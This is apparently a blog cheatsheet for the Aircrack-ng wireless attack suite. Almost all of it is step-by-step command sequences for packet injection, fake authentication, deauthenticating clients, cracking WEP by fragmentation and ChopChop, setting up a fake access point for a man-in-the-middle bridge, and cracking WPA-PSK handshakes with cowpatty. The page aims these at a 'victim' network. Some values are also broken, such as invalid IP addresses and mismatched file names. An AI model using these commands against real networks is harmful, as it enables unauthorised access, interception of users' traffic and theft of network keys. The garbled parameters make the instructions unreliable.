Never Ending Security

It starts all here

Aircrack-NG Suite Cheatsheet



Common Commands Used in Aircrack-ng Suite



injection command


aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0

Fake Authentication Commands

aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -1 0 -e linksys-a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Or another variation for picky access points

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0


Arp Replay Attack


aireplay-ng -3 -b 00:13:10:30:24:9C  mon0

Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
Basic usage:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name

There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same

command plus the ”-r” to read the output file from your last successful ARP replay.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name
The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name
“NOTE” Some access points are configured to only allow selected MAC access to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know
one of the MAC addresses on the allowed list.Thus, the advantage of the next technique (interactive replay) is that it gets around this control.


Reveal Hidden SSID’s using aireplay-ng


for this Attack to work you need an associated client on the network to deauth. this works onall encryption levels and even non encrypted AP’s

Make sure to open up airodump-ng on the channel of your victim to watch for the SSID to be revealed in real time

aireplay-ng -0 5 -a B:S:S:I:D mon0

Thats all there is to it, when the client reconnects to the AP you will

see the hidden SSID revealed in airodump-ng


Decrypt WEP and WPA packets


“NOTE”  you must already have the network key or also called password to use this tool..

airdecap-ng -w password_key capture-01.cap

Using Tshark with the commands below, WEP & WPA have 2 different commands to remember.

For WEP Encrypted Files:

tshark -r capture-01-dec.o1cap -c 10

For WPA encrypted files:

airdecap-ng -p password_key capture-01.cap -e linksys


Clientless WEP Attack using Fragmentation method 


Step 1:      aireplay-ng -1 0 -e linksys -a B:S:S:I:D  -h Y:O:U:R:M:A:C mon0

Step 2:      aireplay-ng -5 -b  B:S:S:I:D -h Y:O:U:R:M:A:C mon0

Step 3:      Use this packet?  type  “Y”  for yes but make sure the size is over 68 from experience.

Step 4:       Type ls   to show the files in your root directory and copy the whole file that ends in .xor

Step 5:    packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-001-002.xor -w arp-request

Step 6:     airodump-ng -c 11 –bssid B:S:S:I:D –ivs -w capture mon0

Step 7:    aireplay-ng -2 -r arp-request mon0

Step 8:    Use this packet?  type  “Y”  for yes but make sure the size is 68 or over from experience.

Step 9:    aircrack-ng -n 64 -b B:S:S:I:D *.ivs

This is assuming your attacking a 64bit encrypted network if not just to the regular aircrack-ng command.


Crack WEP using ChopChop method 


-1  is for Fake Au hentication

-a   is for your Access Point’s Mac Address

0   is for reassociation timing in seconds

-h   is for your cards Mac Address or from an Associated client on the network

-e  The ESSID name of your AP you are attacking

-4   is for ChopChop Attack method

Step 1:

airodump-ng -c 11 -w dump_file -i mon0

Step 2:

aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0            I

t should now say Association successfull with a : )

Step 3:

aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0

The destination Mac Address should not read FF:FF:FF:FF:FF   “if it does do not continue untill it changes or the attack will not work” so keep typing “n” for no  untill it is no longer FF:FF:FF:FF:FF

Step 4:

Now it should say “Saving plain text in replay_000-111-11122.cap  copy the whole name of the .cap file

Step 5:

tcpdump -s 0 -n -e -r replay_000-111-11122.cap

Step 6:

packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S  -a B:S:S:I:D -l 192.168.1.73842 -k 192.108.123.6382 -y

replay_000-111-11122.xor  -w arp-cap

-0 is for the Forged Arp packet

-h  is for your Mac address

-c  is for the Associated Clients Mac address

-a   is for the Access Points Mac address

-l  is to set the destination IP Address

-k  is to set the source IP Address

-y  means to read the PRGA from this file

-w  means to write the packet to this pcap file

Step 7:

aireplay-ng -2 -r arp.cap mon0

Step 8:

Type   “y”   to use the data packet when it asks  and from there your Data field on airodump-ng should start to rise dramaticaly

Step 9:

aircrack-ng -a 1 -x -0    dump_file-01.ivs         dump_file is the one we wrote in step 1:

Step 10:

Then chose your target when asked and aircrack-ng will begin to run


WEP attack with a  Client already connected to the Access Point


Step 1:

airodump-ng -c 11 -w wep -a mon0

-c  is the channel which the target is transmitting on

-w  is the Dump File prefix

-i means save only captured IV’s

mon0   is your monitor mode interface as always

step 2:

aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

-1  is for Fake Authentication

0  is for reassociation timing in seconds

-e is for the target network ESSID or as we know it as the AP’s actual name given by the user  “Example”    FREE WIFI

-a  is for your Access Points Mac Address

-h  is for your own Wireless cards Mac Address

Step 3:

aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0

-3  is for Arp request Replay Attack

-b  is for your Access Points Mac Address

-h  is for your source Mac Address   “Either a Client or from a Fake Association”

Step 4:

aircrack-ng -a 1 -0 -n 128 wep-01.ivs

The 128 is assuming you are cracking a 104bit encrypted network  and the file wep-01.ivs was created from the name given in step 1:

-a  is for force Attack mode

1    is for static WEP

-0    is to apply nice colors to the aircrack-ng terminal window when opened up

-n   is to specify the length for the key  128  for (104bit WEP)


Set up a Fake AP honey pot using Brctrl to get client to connect and run a MITM Attack


  1. Bring up eth0 in backtrack

ifconfig eth0 up
2. Bring up an access point with SSID of what ever name you are trying to clone. for this tutorial I chose linksys but you can make your own.

mitm             is your bridged interface name “you can name it what ever you like for this Attack”

at0                 is the new tap interface created by your wireless card & will be named by your card automatically

dhclient3     is your dhcp client which will help bridge your internet to the victim.

ifconfig wlan0 up

airmon-ng start wlan0
iwconfig wlan0 channel 1
airbase-ng -ssid linksys mon0

Bridge the interfaces

Open up another terminal window to run these commands

ifconfig at0 up

brctl addbr mitm

brctl show   ————->   This will show you have notr added the bridge yet so we’ll do that next

brctl addif mitm eth0

brctl addif mitm at0

ifconfig eth 0 0.0.0.0 up      Vivek uses the IP address of both using all zero’s but you can try others if you like.

ifconfig at0 0.0.0.0 up

If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:

ifconfig mitm

dhclient3 mitm

Now connect a client to the new AP and make sure you are able to surf the web now using the at0

interface & mitm bridge giving dhcp. If you are the options are endless  ; )

Should your eth0 interface loose connection to the internet kill the mitm bridge using the command below,

make sure to stop it first as well as the at0 interface.

brctl delbr mitm                    brctl stands for bridge controll and    delbr    stands for    delete bridge


WPA/WPA2  – PSK Cracking using Rainbowtables with Cowpatty


What do the switches in these commands really mean?

-c              The channel the AP is located on

–bssid        The Mac Address of the AP you are attacking

-0               Specifies to aireplay-ng that it will be a Deauth Atatck, “thats a zero by the way”

-c               after aireplay-ng command  specifies the client connected to the AP which you are attacking

./cowpatty  starts running cowpatty within Backtrack

-r  =           specifies the capture file you will be cracking using Cowpatty

-d              The directory of your RainBow Table you will be using for the attack. basically the location on your hard disk.

Step 1:

airodump-ng  -c  11  –bssid   B:S:S:I:D   -w  LINKSYS mon0

Step 2:

aireplay-ng   -0  1   -a  B:S:S:I:D  -c  C:L:I:E:N:T  mon0

you can increase the  1  to a  5  or more depending how many times you want to deauth the client

Step 3:

./cowpatty    or just open up Cowpatty from your start menu

Step 4:

cowpatty -r LINKSYS -01.cap   -d  /root/Desktop/LINKSYS.wpa   -s  LINKSYS


Test a capture file to see it’s integrity


Open pyrit or cd into the pyrit directory & type the command in below replacing output-01.cap with your own capture file.

pyrit -r output-01.cap analyze

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s